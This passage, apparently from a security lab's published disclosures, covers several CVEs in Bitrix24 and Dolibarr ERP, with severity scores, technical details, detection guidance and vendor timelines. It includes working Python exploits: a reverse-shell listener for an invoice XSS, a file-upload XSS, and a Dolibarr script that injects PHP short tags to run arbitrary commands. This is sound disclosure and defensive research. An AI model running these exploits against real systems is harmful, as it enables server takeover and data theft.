                "INVOICE_PRODUCT_DATA": "[{\"ID\":0,\"PRODUCT_NAME\":\"Bitrix Site Manager\",\"PRODUCT_ID\":23,\"QUANTITY\":\"1.0000\",\"MEASURE_CODE\":796,\"MEASURE_NAME\":\"pcs.\",\"PRICE\":\"0.00\",\"PRICE_EXCLUSIVE\":\"0.00\",\"PRICE_NETTO\":\"0.00\",\"PRICE_BRUTTO\":\"0.00\",\"DISCOUNT_TYPE_ID\":1,\"DISCOUNT_RATE\":\"0.00\",\"DISCOUNT_SUM\":\"0.00\",\"TAX_RATE\":\"0.00\",\"TAX_INCLUDED\":\"N\",\"CUSTOMIZED\":\"Y\",\"SORT\":10}]",
                "INVOICE_PRODUCT_DATA_SETTINGS": "{\"ENABLE_DISCOUNT\": \"N\",\"ENABLE_TAX\": \"N\"}",
                "saveAndView": "Save",
                "invoice_id": TARGET_INVOICE_ID
            }
        )
        print(f"[+] Edited invoice {TARGET_INVOICE_ID}")
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = login(s, USERNAME, PASSWORD)
        edit_invoice(s, sessid)
        print(f"[+] Visit this URL as admin to execute attack: {HOST}/crm/invoice/edit/{TARGET_INVOICE_ID}/")
        print("[+] Waiting for reverse shell connection")
        subprocess.run(["nc", "-nvlp", str(LPORT)])
    

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has access to the CRM feature and permission to create and export contacts. This level of access may be granted if the user is in the management board group.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of the byte string \xe2\x80\xa9 in request bodies. The presence of this string together with other characters like < and = indicate possible exploitation of this vulnerability.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1715: (CVE-2023-1715 & CVE-2023-1716) Bitrix24 Stored Cross-Site Scripting (XSS) via Improper Input Neutralization on Invoice Edit Page

Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.

CVE-2023-1719: (CVE-2023-1719) Bitrix24 Insecure Global Variable Extraction

Lack of mime type response header in Bitrix24 22.0.300 allows authenticated remote attackers to execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via uploading a crafted HTML file through /desktop_app/file.ajax.php?action=uploadfile.

**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

High

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1720

**CVE Description**

Lack of mime type response header in Bitrix24 22.0.300 allows authenticated remote attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via uploading a crafted HTML file through /desktop\_app/file.ajax.php?action=uploadfile.

**CWE Classification(s)**

CWE-434 Unrestricted Upload of File with Dangerous Type

**CAPEC Classification(s)**

CAPEC-592 Stored XSS

**CVSS3.1 Scoring System:**

**Base Score:** 9.6 (Critical) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

None

**User Interaction (UI)**

Required

**Scope (S)**

Changed

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Cross Site Scripting (XSS) vulnerability that allows an attacker to run arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.

Unauthenticated users may use the file upload functionality provided by the /desktop_app/file.ajax.php?action=uploadfile. This endpoint also returns the absolute path of the file on the server, which is of the form $BX_ROOT/upload/tmp/BXTEMP-YYYY-MM-DD/00/bxu/disk/XXX/XXX/default where XXX is a 32 character long hexadecimal string.

As the uploads directory is publicly accessible to the internet, an attacker can determine the URL where Apache will serve their malicious uploaded file. As the uploaded file does not have a file extension, Apache serves the file without a content-type header. Therefore, the browser will have to examine the contents of the response to determine its content type. Thus, if the file contains HTML tags, the browser will render the file as HTML and execute any JavaScript that is present in the file, resulting in XSS.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that uploads a malicious HTML file that executes JavaScript to display the current domain name.

A sample exploit script is shown below:

    # Bitrix24 Stored XSS RCE (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/desktop_app/file.ajax.php?action=uploadfile
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import random
    
    import requests
    import re
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def preauth(s):
        res = s.get(HOST)
        return re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), res.text).group(
            1
        )
    
    
    def upload(session, sessid, data):
        CID = random.randint(0, pow(10, 5))
        resp = session.post(
            HOST + "/desktop_app/file.ajax.php?action=uploadfile",
            headers={
                "X-Bitrix-Csrf-Token": sessid,
                "X-Bitrix-Site-Id": SITE_ID,
            },
            data={
                "bxu_info[mode]": "upload",
                "bxu_info[CID]": str(CID),
                "bxu_info[filesCount]": "1",
                "bxu_info[packageIndex]": f"pIndex{CID}",
                "bxu_info[NAME]": f"file{CID}",
                "bxu_files[0][name]": f"file{CID}",
            },
            files={
                "bxu_files[0][default]": (
                    "file",
                    data,
                    "text/plain",
                )
            },
            proxies=PROXY,
        ).json()
        return resp["files"][0]["file"]["files"]["default"]["tmp_name"]
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = preauth(s)
        path = upload(s, sessid, "<script>alert(document.domain)</script>")
        print("Uploaded file to " + path)
        relpath = path[path.index("/upload"):]
        print("Check out " + HOST + relpath + " for XSS!")
    

**Exploit Conditions:**

This vulnerability can be exploited by unauthenticated users. However, the victim has to visit a specially crafted URL supplied by the attacker.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of <script> tags and other XSS vectors in uploaded files.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1720: (CVE-2023-1720) Bitrix24 Stored Cross-Site Scripting (XSS) via File Upload

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**Summary:**

**Product**

Dolibarr ERP CRM

**Vendor**

Dolibarr

**Severity**

High

**Affected Versions**

<= 18.0.1

**Tested Versions**

17.0.1, 18.0.1

**CVE Identifier**

CVE-2023-4197

**CVE Description**

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**CWE Classification(s)**

CWE-20: Improper Input Validation

**CAPEC Classification(s)**

CAPEC-248 Command Injection CAPEC-153: Input Data Manipulation

**CVSS3.1 Scoring System:**

**Base Score:** 7.5 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

High

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Dolibarr ERP CRM is a web-based software that provides management for the target organization’s activities, such as contacts, suppliers, invoices, orders, stocks, agenda, etc. It is an open-source software suite designed for small, medium or large companies, foundations and freelancers. Administrators can use the fine grained permissions manager to grant permissions to various users based on their operational requirements.

Dolibarr ERP CRM operates as an all-in-one suite, which allows customizability based on the usage needs of the organization. It is highly modular as the administrators simply have to enable modules that they need and disable the ones they do not require. Almost every component is a module, which also means that Dolibarr ERP CRM is highly extensible in terms of features.

**Vulnerability Summary:**

Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for <?php and <?=, allowing usage of the <? short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP.

**Vulnerability Details:**

There are two ways to exploit this vulnerability, one is to “import” content from a specified URL; the other is to edit an existing page.

The vulnerable code can be found in the function dolKeepOnlyPhpCode(), inside the /core/lib/website.lib.php file. where no checking for the <? tag is done. This function intended purpose is to extract the PHP code from the given string and return it to the caller. The caller would throw an error if this function returns a non-empty string since it indicates the presence of PHP code.

    /core/lib/website.lib.php:
    <?php
    
    function dolKeepOnlyPhpCode($str)
    {
        $str = str_replace('<?=', '<?php', $str);
    
        $newstr = '';
    
        // Split on each opening tag
        //$parts = explode('<?php', $str);
        $parts = preg_split('/'.preg_quote('<?php', '/').'/i', $str);
    
        if (!empty($parts)) {
            $i = 0;
            foreach ($parts as $part) {
                if ($i == 0) {  // The first part is never php code
                    $i++;
                    continue;
                }
                $newstr .= '<?php';
                //split on closing tag
                $partlings = explode('?>', $part, 2);
                if (!empty($partlings)) {
                    $newstr .= $partlings[0].'?>';
                } else {
                    $newstr .= $part.'?>';
                }
            }
        }
        return $newstr;
    }
    

This function takes in a single argument which is the string to sanitize. It first replaces all occurrences of <?= with <?php and subsequently all <?php tags are tokenized, and the string between the opening and optional closing tags are selected and returned to the caller.

In order to achieve RCE, the adversary must first be authenticated with an account and the Website module must be enabled. Then, modify an existing web page to include the <? tag where arbitrary PHP code can be executed. Command execution is achieved by using any of the PHP functions that executes system code (i.e. system()). After the web page is modified successfully, previewing the updated page would trigger the RCE:

**Exploit Conditions:**

This vulnerability can be exploited when the “Website” module is enabled, as well as having access to a low-privilege user account.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. The following is a functional exploit written in Python3 that exploits this vulnerability to achieve remote command execution:

    # Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197)
    # Via: https://TARGET_HOST/website/index.php
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import os
    import re
    import requests
    import sys
    import uuid
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password, cmd
    
        print("\n===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====\n")
    
        if len(sys.argv) != 5:
            print("[!] Please enter the required arguments like so: python3 {} https://TARGET_URL USERNAME PASSWORD CMD_TO_EXECUTE".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
        cmd = sys.argv[4]
    
    def authenticate():
        global s, csrf_token
    
        print("[+] Attempting to authenticate...")
    
        # GET the CSRF token
        res = s.get(f"{target}/", verify=False)
        csrf_token = re.search("\"anti-csrf-newtoken\" content=\"(.+)\"", res.text).group(1).strip()
    
        # Login
        data = {
            "token": csrf_token,
            "username": username,
            "password": password,
            "actionlogin": "login"
        }
        res = s.post(f"{target}/", data=data, verify=False)
    
        if "Logout" not in res.text:
            print("[!] Authentication failed! Are the credentials valid?")
            sys.exit(1)
        else:
            print("[+] Authenticated successfully!")
    
    def rce():
        # Create web site
        print("[+] Attempting to create a website...")
        website_name = uuid.uuid4().hex
        data = {
            "WEBSITE_REF": website_name,
            "token": csrf_token,
            "action": "addsite",
            "WEBSITE_LANG": "en",
            "addcontainer": "create"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Website - {website_name}" not in res.text:
            print("[!] Website creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created website name: \"{website_name}\"!")
    
        # Create web page
        print("[+] Attempting to create a web page...")
        webpage_name = uuid.uuid4().hex
        data = {
            "website": website_name,
            "token": csrf_token,
            "action": "addcontainer",
            "WEBSITE_TYPE_CONTAINER": "page",
            "WEBSITE_TITLE": "x",
            "WEBSITE_PAGENAME": webpage_name
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Contenair \\'{webpage_name}\\' added" not in res.text:
            print("[!] Web page creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created web page name: \"{webpage_name}\"!")
    
        # Modify created page
        print("[+] Attempting to modify the web page...")
        webpage_id = re.search(f"<option value=\"(.+)\" .+{webpage_name}", res.text).group(1).strip()
        data = {
            "website": website_name,
            "WEBSITE_PAGENAME": webpage_name,
            "pageid": webpage_id,
            "token": csrf_token,
            "action": "updatemeta",
            "htmlheader": f"<? echo system('{cmd}'); ?>"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if "Saved" not in res.text:
            print("[!] Web page modification failed!")
            sys.exit(1)
        else:
            print("[+] Web page modified successfully!")      
    
        # Trigger RCE
        print(f"[+] Triggering RCE now via: {target}/public/website/index.php?website={website_name}&pageref={webpage_name}")
        res = s.get(f"{target}/public/website/index.php?website={website_name}&pageref={webpage_name}", verify=False)
        if res.status_code != 200:
            print("[!] Web page is not reachable!")
            sys.exit(1)
        else:
            output = re.findall("block -->\n(.+)</head>", res.text, re.MULTILINE | re.DOTALL)[0].strip()
            print(f"[+] RCE successful! Output of command:\n\n{output}")
    
    def main():
        check_args()
        authenticate()
        rce()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

Update the Dolibarr installation to the latest version as shown from the official repository releases page.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the /document/ directory (default upload directory) to see if there are any .tpl files containing <? tags, and further inspecting the code contained within.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2023-09-04 Reported vulnerability to Dolibarr owner
*   2023-09-05 Dolibarr owner acknowledged vulnerability and pushed a patch commit. Also mentioned that it will be in the next release
*   2023-10-11 New version containing patch released
*   2023-11-01 Public Release

Tag

#java